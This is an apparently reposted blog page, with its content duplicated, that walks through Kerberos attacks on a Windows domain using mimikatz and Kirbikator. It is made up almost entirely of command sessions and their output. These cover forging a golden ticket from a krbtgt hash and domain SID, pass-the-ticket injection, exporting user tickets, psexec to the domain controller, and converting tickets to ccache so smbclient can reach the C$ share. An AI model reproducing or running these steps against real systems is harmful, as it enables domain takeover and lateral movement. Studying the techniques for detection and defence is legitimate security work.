zoukankan      html  css  js  c++  java
  • mimikazhi Kerberos Modules

    Kerberos Modules

    1.   .#####.   mimikatz 2.0 alpha (x64) release "Kiwi en C" (Oct  9201500:33:13)

    2.   .## ^ ##.

    3.   ## / ##  /* * *

    4.   ## / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )

    5.   '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)

    6.    '#####'                                     with16 modules * * */

    7.   

    8.   

    9.  mimikatz # kerberos::

    10.ERROR mimikatz_doLocal ; "(null)" command of "kerberos"modulenot found !

    11. 

    12.Module :        kerberos

    13.Full name :     Kerberospackagemodule

    14.Description :

    15. 

    16.             ptt  -  Pass-the-ticket [NT 6]

    17.            list  -  List ticket(s)

    18.             tgt  -  Retrieve current TGT

    19.           purge  -  Purge ticket(s)

    20.          golden  -  WillyWonka factory

    21.            hash  -  Hash password to keys

    22.             ptc  -  Pass-the-ccache [NT6]

    23.           clist  -  List tickets in MIT/Heimdall ccache

    24. 

    25.mimikatz #

    Golden Ticket

    1.  mimikatz # kerberos::golden /user:Administrator /domain:sittingduck.info /sid:S-

    2.  1-5-21-2792304509-1851296738-3446580569 /krbtgt:994ceb7e251e5afc550eef79d8172d64

    3.   /ticket:gold.kirbi

    4.  User      : Administrator

    5.  Domain    : sittingduck.info

    6.  SID       : S-1-5-21-2792304509-1851296738-3446580569

    7.  UserId   : 500

    8.  GroupsId : *513512520518519

    9.  ServiceKey: 994ceb7e251e5afc550eef79d8172d64 - rc4_hmac_nt

    10.Lifetime  : 10/26/201511:28:54 PM ; 10/23/202511:28:54 PM ; 10/23/202511:28:5

    11.4 PM

    12.-> Ticket : gold.kirbi

    13. 

    14. * PAC generated

    15. * PAC signed

    16. * EncTicketPart generated

    17. * EncTicketPart encrypted

    18. * KrbCred generated

    19. 

    20.FinalTicketSaved to file !

    Pass the Ticket

    1.  mimikatz # kerberos::ptt gold.kirbi

    2.    0 - File'gold.kirbi' : OK

    3.   

    4.  mimikatz # kerberos::list

    5.   

    6.  [00000000] - 0x00000017 - rc4_hmac_nt

    7.     Start/End/MaxRenew: 10/26/201511:28:54 PM ; 10/23/202511:28:54 PM ; 10/23/2

    8.  02511:28:54 PM

    9.     ServerName       : krbtgt/sittingduck.info @ sittingduck.info

    10.   ClientName       : Administrator @ sittingduck.info

    11.   Flags40e00000    : pre_authent ; initial ; renewable ; forwardable ;

    12. 

    13.mimikatz #

    Injecting tickets with Kirbikator

    1.  C:Users otanadminDesktop>kirbikator.exe lsa gold.kirbi

    2.   

    3.    .#####.   KiRBikator1.0 (x86) release "Kiwi en C" (Feb  1201503:37:29)

    4.   .## ^ ##.

    5.   ## / ##  /* * *

    6.   ## / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )

    7.   '## v ##'   http://blog.gentilkiwi.com                      (oe.eo)

    8.    '#####'                                                     * * */

    9.   

    10.Destination : Microsoft LSA API (multiple)

    11. < gold.kirbi (RFC KRB-CRED (#22))

    12. > TicketAdministrator@sittingduck.info-krbtgt~sittingduck.info@sittingduck.inf

    13.o : injected

    Exporting active tickets

    1.  mimikatz # kerberos::list /export

    2.   

    3.  [00000000] - 0x00000012 - aes256_hmac

    4.     Start/End/MaxRenew: 10/26/201511:39:32 PM ; 10/27/20159:39:31 AM ; 11/2/201

    5.  511:39:31 PM

    6.     ServerName       : krbtgt/SITTINGDUCK.INFO @ SITTINGDUCK.INFO

    7.     ClientName       : uberuser @ SITTINGDUCK.INFO

    8.     Flags60a10000    : name_canonicalize ; pre_authent ; renewable ; forwarded ;

    9.   forwardable ;

    10.   * Saved to file     : 0-60a10000-uberuser@krbtgt~SITTINGDUCK.INFO-SITTINGDUCK

    11..INFO.kirbi

    12. 

    13.[00000001] - 0x00000012 - aes256_hmac

    14.   Start/End/MaxRenew: 10/26/201511:39:31 PM ; 10/27/20159:39:31 AM ; 11/2/201

    15.511:39:31 PM

    16.   ServerName       : krbtgt/SITTINGDUCK.INFO @ SITTINGDUCK.INFO

    17.   ClientName       : uberuser @ SITTINGDUCK.INFO

    18.   Flags40e10000    : name_canonicalize ; pre_authent ; initial ; renewable ; f

    19.orwardable ;

    20.   * Saved to file     : 1-40e10000-uberuser@krbtgt~SITTINGDUCK.INFO-SITTINGDUCK

    21..INFO.kirbi

    22. 

    23.[00000002] - 0x00000012 - aes256_hmac

    24.   Start/End/MaxRenew: 10/26/201511:39:32 PM ; 10/27/20159:39:31 AM ; 11/2/201

    25.511:39:31 PM

    26.   ServerName       : cifs/dc1.sittingduck.info @ SITTINGDUCK.INFO

    27.   ClientName       : uberuser @ SITTINGDUCK.INFO

    28.   Flags40a50000    : name_canonicalize ; ok_as_delegate ; pre_authent ; renewa

    29.ble ; forwardable ;

    30.   * Saved to file     : 2-40a50000-uberuser@cifs~dc1.sittingduck.info-SITTINGDU

    31.CK.INFO.kirbi

    32. 

    33.[00000003] - 0x00000012 - aes256_hmac

    34.   Start/End/MaxRenew: 10/26/201511:39:32 PM ; 10/27/20159:39:31 AM ; 11/2/201

    35.511:39:31 PM

    36.   ServerName       : ldap/dc1.sittingduck.info @ SITTINGDUCK.INFO

    37.   ClientName       : uberuser @ SITTINGDUCK.INFO

    38.   Flags40a50000    : name_canonicalize ; ok_as_delegate ; pre_authent ; renewa

    39.ble ; forwardable ;

    40.   * Saved to file     : 3-40a50000-uberuser@ldap~dc1.sittingduck.info-SITTINGDU

    41.CK.INFO.kirbi

    42. 

    43.[00000004] - 0x00000012 - aes256_hmac

    44.   Start/End/MaxRenew: 10/26/201511:39:31 PM ; 10/27/20159:39:31 AM ; 11/2/201

    45.511:39:31 PM

    46.   ServerName       : LDAP/dc1.sittingduck.info/sittingduck.info @ SITTINGDUCK.

    47.INFO

    48.   ClientName       : uberuser @ SITTINGDUCK.INFO

    49.   Flags40a50000    : name_canonicalize ; ok_as_delegate ; pre_authent ; renewa

    50.ble ; forwardable ;

    51.   * Saved to file     : 4-40a50000-uberuser@LDAP~dc1.sittingduck.info~sittingdu

    52.ck.info-SITTINGDUCK.INFO.kirbi

    PSEXEC with standard Kerberos tickets

    1.  mimikatz # kerberos::list

    2.   

    3.  mimikatz # (EMPTY LIST)

    4.   

    5.  mimikatz # kerberos::ptt 1-40e10000-uberuser@krbtgt~SITTINGDUCK.INFO-SITTINGDUCK

    6.  .INFO.kirbi

    7.    0 - File'1-40e10000-uberuser@krbtgt~SITTINGDUCK.INFO-SITTINGDUCK.INFO.kirbi'

    8.  : OK

    9.   

    10.mimikatz # kerberos::ptt 2-40a50000-uberuser@cifs~dc1.sittingduck.info-SITTINGDU

    11.CK.INFO.kirbi

    12.  0 - File'2-40a50000-uberuser@cifs~dc1.sittingduck.info-SITTINGDUCK.INFO.kirbi

    13.' : OK

    14. 

    15.mimikatz # kerberos::list

    16. 

    17.[00000000] - 0x00000012 - aes256_hmac

    18.   Start/End/MaxRenew: 10/26/201511:39:31 PM ; 10/27/20159:39:31 AM ; 11/2/201

    19.511:39:31 PM

    20.   ServerName       : krbtgt/SITTINGDUCK.INFO @ SITTINGDUCK.INFO

    21.   ClientName       : uberuser @ SITTINGDUCK.INFO

    22.   Flags40e10000    : name_canonicalize ; pre_authent ; initial ; renewable ; f

    23.orwardable ;

    24. 

    25.[00000001] - 0x00000012 - aes256_hmac

    26.   Start/End/MaxRenew: 10/26/201511:39:32 PM ; 10/27/20159:39:31 AM ; 11/2/201

    27.511:39:31 PM

    28.   ServerName       : cifs/dc1.sittingduck.info @ SITTINGDUCK.INFO

    29.   ClientName       : uberuser @ SITTINGDUCK.INFO

    30.   Flags40a50000    : name_canonicalize ; ok_as_delegate ; pre_authent ; renewa

    31.ble ; forwardable ;

    32. 

    33.mimikatz #

    34. 

    35. 

    36. 

    37.C:Users otanadminDesktop>psexec \dc1 cmd.exe

    38. 

    39.PsExec v1.97 - Execute processes remotely

    40.Copyright (C) 2001-2009MarkRussinovich

    41.Sysinternals - www.sysinternals.com

    42. 

    43. 

    44.MicrosoftWindows [Version6.3.9600]

    45.(c) 2013MicrosoftCorporation. All rights reserved.

    46. 

    47.C:Windowssystem32>whoami

    48.sittingduckuberuser

    49. 

    50.C:Windowssystem32>echo %COMPUTERNAME%

    51.DC1

    52. 

    53.C:Windowssystem32>

    Convert Mimikatz Kerberos ticket to CCache and use

    1.  C:Users otanadminDesktop>kirbikator.exe ccache "2-40a50000-uberuser@cifs~dc1.

    2.  sittingduck.info-SITTINGDUCK.INFO.kirbi"

    3.   

    4.    .#####.   KiRBikator1.0 (x86) release "Kiwi en C" (Feb  1201503:37:29)

    5.   .## ^ ##.

    6.   ## / ##  /* * *

    7.   ## / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )

    8.   '## v ##'   http://blog.gentilkiwi.com                      (oe.eo)

    9.    '#####'                                                     * * */

    10. 

    11.Destination : MIT CredentialCache (simple)

    12. < 2-40a50000-uberuser@cifs~dc1.sittingduck.info-SITTINGDUCK.INFO.kirbi (RFC KRB

    13.-CRED (#22))

    14. > Single file : uberuser@SITTINGDUCK.INFO.ccache

    15. 

    16.C:Users otanadminDesktop>

    Method 1

    1.  KRB5CCNAME=uberuser@SITTINGDUCK.INFO.ccache smbclient -k //dc1.sittingduck.info/c$

    2.  OS=[WindowsServer2012 R2 Standard9600] Server=[WindowsServer2012 R2 Standard6.3]

    3.  smb: >

    Method 2

    1.  root@kali:~# apt-get install krb5-user

    2.  Readingpackage lists... Done

    3.  Building dependency tree      

    4.  Reading state information... Done

    5.  The following extra packages will be installed:

    6.    krb5-config libgssrpc4 libkadm5clnt-mit9 libkadm5srv-mit9 libkdb5-7

    7.  Suggested packages:

    8.    krb5-doc

    9.  The following NEW packages will be installed:

    10.  krb5-config krb5-user libgssrpc4 libkadm5clnt-mit9 libkadm5srv-mit9 libkdb5-7

    11.0 upgraded, 6 newly installed, 0 to remove and0not upgraded.

    12.Need to get466 kB of archives.

    13.Afterthis operation, 1,199 kB of additional disk space will be used.

    14.Do you want to continue? [Y/n] y

    15.0% [Connecting to http.kali.org]

    16.<SNIP>

    17.<SNIP>

    18.<SNIP>

    19. 

    20.root@kali:~/Desktop# klist

    21.klist: Credentials cache file '/tmp/krb5cc_0'not found

    22.root@kali:~/Desktop# cp uberuser@SITTINGDUCK.INFO.ccache /tmp/krb5cc_0

    23.root@kali:~/Desktop# smbclient -k //dc1.sittingduck.info/c$

    24.OS=[WindowsServer2012 R2 Standard9600] Server=[WindowsServer2012 R2 Standard6.3]

    25.smb: >

     

     

    Kerberos Modules

    1.   .#####.   mimikatz 2.0 alpha (x64) release "Kiwi en C" (Oct  9201500:33:13)

    2.   .## ^ ##.

    3.   ## / ##  /* * *

    4.   ## / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )

    5.   '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)

    6.    '#####'                                     with16 modules * * */

    7.   

    8.   

    9.  mimikatz # kerberos::

    10.ERROR mimikatz_doLocal ; "(null)" command of "kerberos"modulenot found !

    11. 

    12.Module :        kerberos

    13.Full name :     Kerberospackagemodule

    14.Description :

    15. 

    16.             ptt  -  Pass-the-ticket [NT 6]

    17.            list  -  List ticket(s)

    18.             tgt  -  Retrieve current TGT

    19.           purge  -  Purge ticket(s)

    20.          golden  -  WillyWonka factory

    21.            hash  -  Hash password to keys

    22.             ptc  -  Pass-the-ccache [NT6]

    23.           clist  -  List tickets in MIT/Heimdall ccache

    24. 

    25.mimikatz #

    Golden Ticket

    1.  mimikatz # kerberos::golden /user:Administrator /domain:sittingduck.info /sid:S-

    2.  1-5-21-2792304509-1851296738-3446580569 /krbtgt:994ceb7e251e5afc550eef79d8172d64

    3.   /ticket:gold.kirbi

    4.  User      : Administrator

    5.  Domain    : sittingduck.info

    6.  SID       : S-1-5-21-2792304509-1851296738-3446580569

    7.  UserId   : 500

    8.  GroupsId : *513512520518519

    9.  ServiceKey: 994ceb7e251e5afc550eef79d8172d64 - rc4_hmac_nt

    10.Lifetime  : 10/26/201511:28:54 PM ; 10/23/202511:28:54 PM ; 10/23/202511:28:5

    11.4 PM

    12.-> Ticket : gold.kirbi

    13. 

    14. * PAC generated

    15. * PAC signed

    16. * EncTicketPart generated

    17. * EncTicketPart encrypted

    18. * KrbCred generated

    19. 

    20.FinalTicketSaved to file !

    Pass the Ticket

    1.  mimikatz # kerberos::ptt gold.kirbi

    2.    0 - File'gold.kirbi' : OK

    3.   

    4.  mimikatz # kerberos::list

    5.   

    6.  [00000000] - 0x00000017 - rc4_hmac_nt

    7.     Start/End/MaxRenew: 10/26/201511:28:54 PM ; 10/23/202511:28:54 PM ; 10/23/2

    8.  02511:28:54 PM

    9.     ServerName       : krbtgt/sittingduck.info @ sittingduck.info

    10.   ClientName       : Administrator @ sittingduck.info

    11.   Flags40e00000    : pre_authent ; initial ; renewable ; forwardable ;

    12. 

    13.mimikatz #

    Injecting tickets with Kirbikator

    1.  C:Users otanadminDesktop>kirbikator.exe lsa gold.kirbi

    2.   

    3.    .#####.   KiRBikator1.0 (x86) release "Kiwi en C" (Feb  1201503:37:29)

    4.   .## ^ ##.

    5.   ## / ##  /* * *

    6.   ## / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )

    7.   '## v ##'   http://blog.gentilkiwi.com                      (oe.eo)

    8.    '#####'                                                     * * */

    9.   

    10.Destination : Microsoft LSA API (multiple)

    11. < gold.kirbi (RFC KRB-CRED (#22))

    12. > TicketAdministrator@sittingduck.info-krbtgt~sittingduck.info@sittingduck.inf

    13.o : injected

    Exporting active tickets

    1.  mimikatz # kerberos::list /export

    2.   

    3.  [00000000] - 0x00000012 - aes256_hmac

    4.     Start/End/MaxRenew: 10/26/201511:39:32 PM ; 10/27/20159:39:31 AM ; 11/2/201

    5.  511:39:31 PM

    6.     ServerName       : krbtgt/SITTINGDUCK.INFO @ SITTINGDUCK.INFO

    7.     ClientName       : uberuser @ SITTINGDUCK.INFO

    8.     Flags60a10000    : name_canonicalize ; pre_authent ; renewable ; forwarded ;

    9.   forwardable ;

    10.   * Saved to file     : 0-60a10000-uberuser@krbtgt~SITTINGDUCK.INFO-SITTINGDUCK

    11..INFO.kirbi

    12. 

    13.[00000001] - 0x00000012 - aes256_hmac

    14.   Start/End/MaxRenew: 10/26/201511:39:31 PM ; 10/27/20159:39:31 AM ; 11/2/201

    15.511:39:31 PM

    16.   ServerName       : krbtgt/SITTINGDUCK.INFO @ SITTINGDUCK.INFO

    17.   ClientName       : uberuser @ SITTINGDUCK.INFO

    18.   Flags40e10000    : name_canonicalize ; pre_authent ; initial ; renewable ; f

    19.orwardable ;

    20.   * Saved to file     : 1-40e10000-uberuser@krbtgt~SITTINGDUCK.INFO-SITTINGDUCK

    21..INFO.kirbi

    22. 

    23.[00000002] - 0x00000012 - aes256_hmac

    24.   Start/End/MaxRenew: 10/26/201511:39:32 PM ; 10/27/20159:39:31 AM ; 11/2/201

    25.511:39:31 PM

    26.   ServerName       : cifs/dc1.sittingduck.info @ SITTINGDUCK.INFO

    27.   ClientName       : uberuser @ SITTINGDUCK.INFO

    28.   Flags40a50000    : name_canonicalize ; ok_as_delegate ; pre_authent ; renewa

    29.ble ; forwardable ;

    30.   * Saved to file     : 2-40a50000-uberuser@cifs~dc1.sittingduck.info-SITTINGDU

    31.CK.INFO.kirbi

    32. 

    33.[00000003] - 0x00000012 - aes256_hmac

    34.   Start/End/MaxRenew: 10/26/201511:39:32 PM ; 10/27/20159:39:31 AM ; 11/2/201

    35.511:39:31 PM

    36.   ServerName       : ldap/dc1.sittingduck.info @ SITTINGDUCK.INFO

    37.   ClientName       : uberuser @ SITTINGDUCK.INFO

    38.   Flags40a50000    : name_canonicalize ; ok_as_delegate ; pre_authent ; renewa

    39.ble ; forwardable ;

    40.   * Saved to file     : 3-40a50000-uberuser@ldap~dc1.sittingduck.info-SITTINGDU

    41.CK.INFO.kirbi

    42. 

    43.[00000004] - 0x00000012 - aes256_hmac

    44.   Start/End/MaxRenew: 10/26/201511:39:31 PM ; 10/27/20159:39:31 AM ; 11/2/201

    45.511:39:31 PM

    46.   ServerName       : LDAP/dc1.sittingduck.info/sittingduck.info @ SITTINGDUCK.

    47.INFO

    48.   ClientName       : uberuser @ SITTINGDUCK.INFO

    49.   Flags40a50000    : name_canonicalize ; ok_as_delegate ; pre_authent ; renewa

    50.ble ; forwardable ;

    51.   * Saved to file     : 4-40a50000-uberuser@LDAP~dc1.sittingduck.info~sittingdu

    52.ck.info-SITTINGDUCK.INFO.kirbi

    PSEXEC with standard Kerberos tickets

    1.  mimikatz # kerberos::list

    2.   

    3.  mimikatz # (EMPTY LIST)

    4.   

    5.  mimikatz # kerberos::ptt 1-40e10000-uberuser@krbtgt~SITTINGDUCK.INFO-SITTINGDUCK

    6.  .INFO.kirbi

    7.    0 - File'1-40e10000-uberuser@krbtgt~SITTINGDUCK.INFO-SITTINGDUCK.INFO.kirbi'

    8.  : OK

    9.   

    10.mimikatz # kerberos::ptt 2-40a50000-uberuser@cifs~dc1.sittingduck.info-SITTINGDU

    11.CK.INFO.kirbi

    12.  0 - File'2-40a50000-uberuser@cifs~dc1.sittingduck.info-SITTINGDUCK.INFO.kirbi

    13.' : OK

    14. 

    15.mimikatz # kerberos::list

    16. 

    17.[00000000] - 0x00000012 - aes256_hmac

    18.   Start/End/MaxRenew: 10/26/201511:39:31 PM ; 10/27/20159:39:31 AM ; 11/2/201

    19.511:39:31 PM

    20.   ServerName       : krbtgt/SITTINGDUCK.INFO @ SITTINGDUCK.INFO

    21.   ClientName       : uberuser @ SITTINGDUCK.INFO

    22.   Flags40e10000    : name_canonicalize ; pre_authent ; initial ; renewable ; f

    23.orwardable ;

    24. 

    25.[00000001] - 0x00000012 - aes256_hmac

    26.   Start/End/MaxRenew: 10/26/201511:39:32 PM ; 10/27/20159:39:31 AM ; 11/2/201

    27.511:39:31 PM

    28.   ServerName       : cifs/dc1.sittingduck.info @ SITTINGDUCK.INFO

    29.   ClientName       : uberuser @ SITTINGDUCK.INFO

    30.   Flags40a50000    : name_canonicalize ; ok_as_delegate ; pre_authent ; renewa

    31.ble ; forwardable ;

    32. 

    33.mimikatz #

    34. 

    35. 

    36. 

    37.C:Users otanadminDesktop>psexec \dc1 cmd.exe

    38. 

    39.PsExec v1.97 - Execute processes remotely

    40.Copyright (C) 2001-2009MarkRussinovich

    41.Sysinternals - www.sysinternals.com

    42. 

    43. 

    44.MicrosoftWindows [Version6.3.9600]

    45.(c) 2013MicrosoftCorporation. All rights reserved.

    46. 

    47.C:Windowssystem32>whoami

    48.sittingduckuberuser

    49. 

    50.C:Windowssystem32>echo %COMPUTERNAME%

    51.DC1

    52. 

    53.C:Windowssystem32>

    Convert Mimikatz Kerberos ticket to CCache and use

    1.  C:Users otanadminDesktop>kirbikator.exe ccache "2-40a50000-uberuser@cifs~dc1.

    2.  sittingduck.info-SITTINGDUCK.INFO.kirbi"

    3.   

    4.    .#####.   KiRBikator1.0 (x86) release "Kiwi en C" (Feb  1201503:37:29)

    5.   .## ^ ##.

    6.   ## / ##  /* * *

    7.   ## / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )

    8.   '## v ##'   http://blog.gentilkiwi.com                      (oe.eo)

    9.    '#####'                                                     * * */

    10. 

    11.Destination : MIT CredentialCache (simple)

    12. < 2-40a50000-uberuser@cifs~dc1.sittingduck.info-SITTINGDUCK.INFO.kirbi (RFC KRB

    13.-CRED (#22))

    14. > Single file : uberuser@SITTINGDUCK.INFO.ccache

    15. 

    16.C:Users otanadminDesktop>

    Method 1

    1.  KRB5CCNAME=uberuser@SITTINGDUCK.INFO.ccache smbclient -k //dc1.sittingduck.info/c$

    2.  OS=[WindowsServer2012 R2 Standard9600] Server=[WindowsServer2012 R2 Standard6.3]

    3.  smb: >

    Method 2

    1.  root@kali:~# apt-get install krb5-user

    2.  Readingpackage lists... Done

    3.  Building dependency tree      

    4.  Reading state information... Done

    5.  The following extra packages will be installed:

    6.    krb5-config libgssrpc4 libkadm5clnt-mit9 libkadm5srv-mit9 libkdb5-7

    7.  Suggested packages:

    8.    krb5-doc

    9.  The following NEW packages will be installed:

    10.  krb5-config krb5-user libgssrpc4 libkadm5clnt-mit9 libkadm5srv-mit9 libkdb5-7

    11.0 upgraded, 6 newly installed, 0 to remove and0not upgraded.

    12.Need to get466 kB of archives.

    13.Afterthis operation, 1,199 kB of additional disk space will be used.

    14.Do you want to continue? [Y/n] y

    15.0% [Connecting to http.kali.org]

    16.<SNIP>

    17.<SNIP>

    18.<SNIP>

    19. 

    20.root@kali:~/Desktop# klist

    21.klist: Credentials cache file '/tmp/krb5cc_0'not found

    22.root@kali:~/Desktop# cp uberuser@SITTINGDUCK.INFO.ccache /tmp/krb5cc_0

    23.root@kali:~/Desktop# smbclient -k //dc1.sittingduck.info/c$

    24.OS=[WindowsServer2012 R2 Standard9600] Server=[WindowsServer2012 R2 Standard6.3]

    25.smb: >

    标签: mimikatz, kerberos

     

  • 相关阅读:
    [转]asp.net页面缓存技术
    UL和LI在div中的高度的IE6下兼容性
    jquery制作的横向图片滚动带横向滚动条TackerScroll
    电脑可以上网,但是qq登陆不上去?
    Introduction to discrete event system学习笔记4.6
    Introduction to Discrete event system学习笔记4.9
    Introduction to discrete event systemsstudy 4.5
    Symbolic synthesis of obserability requirements for diagnosability B.Bittner,M.Bozzano,A.Cimatti,and X.Olive笔记4.16
    Introduction to discrete event system学习笔记4.8pm
    Introduction to discrete event system学习笔记 4.8
  • 原文地址:https://www.cnblogs.com/backlion/p/6025754.html
Copyright © 2011-2022 走看看